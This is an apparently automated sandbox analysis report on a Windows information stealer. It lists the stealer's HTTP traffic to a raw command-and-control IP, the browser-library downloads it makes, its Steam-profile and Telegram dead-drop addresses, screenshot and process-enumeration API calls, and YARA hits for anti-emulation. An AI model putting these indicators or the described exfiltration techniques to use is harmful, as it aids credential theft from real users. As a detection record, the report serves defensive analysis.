                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_0040514C
                  Source: global traffic HTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /sqlx.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Connection: Keep-Alive Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Cache-Control: no-cache
                  Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
                  Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 Host: 95.217.240.101 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
                  Source: file.exe, 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/badges
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/inventory/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/about/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/explore/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/legal/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/mobile
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/stats/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: GCBFBG.3.drString found in binary or memory: https://support.mozilla.org
                  Source: GCBFBG.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: GCBFBG.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: GDAAKF.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: GDAAKF.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                  Source: file.exe, 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/k0mono
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: JEGHDA.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                  Source: JEGHDA.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: unknown HTTPS traffic detected: 23.194.234.100:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 3_2_004112FD

                  System Summary

                  Source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                  Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                  Source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                  Source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                  Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables containing potential Windows Defender anti-emulation checks, Author: ditekSHen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C6EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 3_2_6C6EED10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C72B8C0 rand_s,NtQueryVirtualMemory, 3_2_6C72B8C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C72B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 3_2_6C72B910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C72B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6C72B700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C6CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6C6CF280
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C81EA003_2_6C81EA00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C828A303_2_6C828A30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7EEA803_2_6C7EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C810BA03_2_6C810BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C876BE03_2_6C876BE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C778BAC3_2_6C778BAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C89A4803_2_6C89A480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7884603_2_6C788460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7FA4303_2_6C7FA430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C80A4D03_2_6C80A4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D44203_2_6C7D4420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7B64D03_2_6C7B64D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D25603_2_6C7D2560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7C85403_2_6C7C8540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C83A5E03_2_6C83A5E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7FE5F03_2_6C7FE5F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7645B03_2_6C7645B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8745403_2_6C874540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B85503_2_6C8B8550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8105703_2_6C810570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7CC6503_2_6C7CC650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C80E6E03_2_6C80E6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7CE6E03_2_6C7CE6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7946D03_2_6C7946D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F07003_2_6C7F0700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C79A7D03_2_6C79A7D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7BE0703_2_6C7BE070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C84C0B03_2_6C84C0B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C83C0003_2_6C83C000
                  Source: C:\Users\user\Desktop\file.exe Code function: String function: 006E7D60 appears 53 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C793620 appears 44 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C8F09D0 appears 173 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C799B10 appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004024D7 appears 312 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C7094D0 appears 90 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C8FDAE0 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004180A8 appears 104 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C8FD930 appears 33 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C6FCBE8 appears 134 times
                  Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/25@1/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C727030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199686524322[1].htm
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
                  Source: C:\Users\user\Desktop\file.exe Command line argument: .o 0_2_006FE980
                  Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.ini
                  Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
